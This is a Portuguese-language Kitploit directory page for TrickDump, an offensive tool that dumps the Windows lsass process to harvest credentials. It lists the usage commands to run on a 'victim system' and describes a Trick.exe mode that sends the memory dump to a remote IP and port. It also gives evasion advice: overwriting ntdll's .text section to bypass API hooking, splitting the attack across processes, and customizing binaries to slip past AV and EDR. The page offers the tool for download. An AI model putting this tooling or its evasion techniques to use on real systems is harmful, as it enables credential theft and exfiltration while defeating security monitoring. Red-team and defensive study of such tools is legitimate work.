Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
TrickDump — Despejar lsass usando apenas funções NTAPI criando 3 arquivos JSON e 1 ZIP... e gerar o arquivo MiniDump depois! | Kitploit
Ferramentas/GitHubGitHub/ricardojoserf/trickdump
Forensia de MemóriaPós-ExploraçãoRed Teaming
GitHubricardojoserf/trickdump

TrickDump

Despejar lsass usando apenas funções NTAPI criando 3 arquivos JSON e 1 ZIP... e gerar o arquivo MiniDump depois!

Ver RepositórioSite
566584há 23 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

TrickDump

O TrickDump despeja o processo lsass sem criar um arquivo Minidump, gerando em vez disso 3 arquivos JSON e 1 arquivo ZIP com os despejos das regiões de memória. Em três etapas:

  • Lock: Obtém informações do SO usando RtlGetVersion.

  • Shock: Obtém o privilégio SeDebugPrivilege com NtOpenProcessToken e NtAdjustPrivilegeToken, abre um handle com NtGetNextProcess e NtQueryInformationProcess e depois obtém informações dos módulos usando NtQueryInformationProcess e NtReadVirtualMemory.

  • Barrel: Obtém o privilégio SeDebugPrivilege, abre um handle e depois obtém informações e despeja regiões de memória usando NtQueryVirtualMemory e NtReadVirtualMemory.

img

No sistema atacante, use o script create_dump.py para gerar o arquivo Minidump:

root@kitploit:~
python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE] 

Os benefícios desta técnica são:

  • Nunca há um arquivo Minidump válido em disco, memória ou no tráfego de rede.

  • Não há um único programa ou processo executando todo o ataque, mas três separados, o que pode levantar menos bandeiras.

    • Se preferir executar apenas um programa, pode usar o Trick.
    • Se já tiver informações sobre o SO da máquina alvo, pode pular a primeira etapa ("Lock").
  • Os programas usam apenas NTAPIS (este projeto é uma variante do NativeDump).

  • Não usa OpenProcess ou NtOpenProcess para obter o handle do processo lsass com os direitos de acesso PROCESS_VM_OPERATION e PROCESS_VM_WRITE.

  • Cada programa permite sobrescrever a seção ".text" da biblioteca ntdll.dll para contornar o hooking de API:

    • "disk": Usando uma DLL já em disco. Se um segundo argumento não for usado, o caminho é "C:\Windows\System32\ntdll.dll".
    • "knowndlls": Usando a pasta KnownDlls.
    • "debugproc": Usando um processo criado em modo de depuração. Se um segundo argumento não for usado, o processo é "c:\windows\system32\calc.exe".

Está disponível em diferentes linguagens:

  • .NET: O branch principal
  • Python: O branch python-flavour
  • Golang: O branch golang-flavour
  • C/C++: O branch c-flavour
  • BOF files: O branch bof-flavour
  • Crystal: O branch crystal-flavour
  • Nim: O branch nim-flavour
  • Rust: O branch rust-flavour

Não funcionará se o PPL estiver ativado, a estrutura PEB estiver ilegível ou os binários não forem compilados como 64 bits. Atualização: Agora é possível executar os programas sem ler o PEB, confira o branch peb-unreadable :)

A técnica funciona bem nas versões mais recentes do Windows e foi testada contra soluções comuns de AV e EDR, mas a furtividade dependerá da "variante" que você escolher: use linguagens incomuns e personalize os binários para obter os melhores resultados!


Uso

Os programas são executados no sistema vítima, criando três arquivos JSON (com informações das regiões de memória) e um arquivo zip (com cada despejo de região de memória).

root@kitploit:~
Lock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Shock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Barrel.exe [disk/knowndlls/debugproc]

Você pode executar os programas diretamente sem sobrescrever a biblioteca ntdll.dll:

img1

Ou usar uma das três técnicas de sobrescrita diferentes:

img2

Em seguida, o arquivo Minidump é gerado:

img3


Tudo em um

Se preferir executar apenas um binário, o Trick.exe gera um arquivo ZIP contendo os 3 arquivos JSON e o arquivo ZIP com as regiões de memória:

root@kitploit:~
Trick.exe [disk/knowndlls/debugproc] [IP_ADDRESS] [PORT]

Você pode criar o arquivo ZIP localmente, opcionalmente usando um método de sobrescrita do Ntdll:

img5

Ou enviá-lo para uma porta remota usando o segundo e terceiro parâmetros como endereço IP e porta:

img6

Em ambos os casos, você obtém um arquivo ZIP como este, descompacte e crie o arquivo Minidump:

img7

Baixar ferramenta